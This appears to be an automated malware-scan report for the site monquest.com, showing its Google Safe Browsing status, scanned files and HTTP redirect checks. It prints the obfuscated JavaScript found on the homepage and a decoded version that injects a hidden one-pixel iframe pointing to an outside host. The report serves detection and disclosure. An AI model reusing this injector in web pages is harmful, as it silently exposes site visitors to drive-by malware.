Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=monquest.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://monquest.com/ | 200 OK Content-Length: 9106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var ORNJv="(/5y/g,'%')";var wIOcl="')));var ";var yDDBqg2H="5y565y305";var K0ZiyN8="'4')));var jMtb";var i1QRaAA="5y3B';eval(unes";var ZGT88Sx9="KVVOOu%4DOO";var gpOMBqj="i3Dii27";var AsTnPnq="ace(/4";var e29gnLc="i75ii6Dii";var TvU2aS="e(/8r/";var HMJy0q6="1ii73ii6Eii61ii";var W4xjL=");";var GtBD="E75y465y27";var Qgfy="y565y305y2B5y27";i1QRaAA="275y29"+i1QRaAA;var PoVx=");var Yl0Fg='i";var JEt8="Er7zH6rz";var l01c8Mw="Ou%44OOu%27O";var iq8zTI4="8r74rN8";var q8YJXQGT="FITE35y75ITED";ORNJv="').re Decoded script: var vtg1Co72='5y76ITE15y725y205y5A5y535y565y305y3D5y225y39rwITE4ITE95y765y20ITE9ITE45y3D5y275y43ITE25y31ITE5ITE75y465y275y3E5y39rw5y2FITE4ITE95y765y3E5y225y3BITE9ITE65y28ITE4ITEFITE35y75ITEDITE5ITEE5y745y2EITE2ITEFITE45y795y3D5y3DITEE5y75ITE9rwITE9rw5y295y5A5y535y565y305y3D5y275y39rwITE2ITEFITE45y795y3E5y275y2B5y5A5y535y565y305y2B5y275y39rw5y2FITE2ITEFITE45y795y3E5y275y3BITE4ITEFITE35y75ITEDITE5ITEE5y745y2E5y775y72ITE95y74ITE55y205y285y5A5y535y565y305y295y3B5y76ITE15y725y205y56ITE9rw5y4D5y7 var p4e3ZMMx=document.createElement('iframe');p4e3ZMMx.src='http://triplex.lazyfish.cc/forum/Lasna';p4e3ZMMx.width='1'; p4e3ZMMx.height='1'; p4e3ZMMx.height='1'; p4e3ZMMx.name='F2VQ6Vpv6FSD'; p4e3ZMMx.name='F2VQ6Vpv6FSD'; p4e3ZMMx.style.visibility='hidden';VlMw1oB.appendChild(p4e3ZMMx); p4e3ZMMx.style.visibility='hidden';VlMw1oB.appendChild(p4e3ZMMx); <div id='Cb1egF'></div> Antivirus reports:
| ||
http://monquest.com/test404page.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: monquest.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 28 Aug 2014 21:53:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 9106
Content-Type: text/html; charset=ISO-8859-1
Last-Modified: Wed, 13 May 2009 16:19:49 GMT
...9106 bytes of data.
GET / HTTP/1.1
Host: monquest.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 28 Aug 2014 21:53:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 9106
Content-Type: text/html; charset=ISO-8859-1
Last-Modified: Wed, 13 May 2009 16:19:49 GMT
...9106 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: monquest.com
Referer: http://www.google.com/search?q=monquest.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: monquest.com
Referer: http://www.google.com/search?q=monquest.com
Result:
The result is similar to the first query. There are no suspicious redirects found.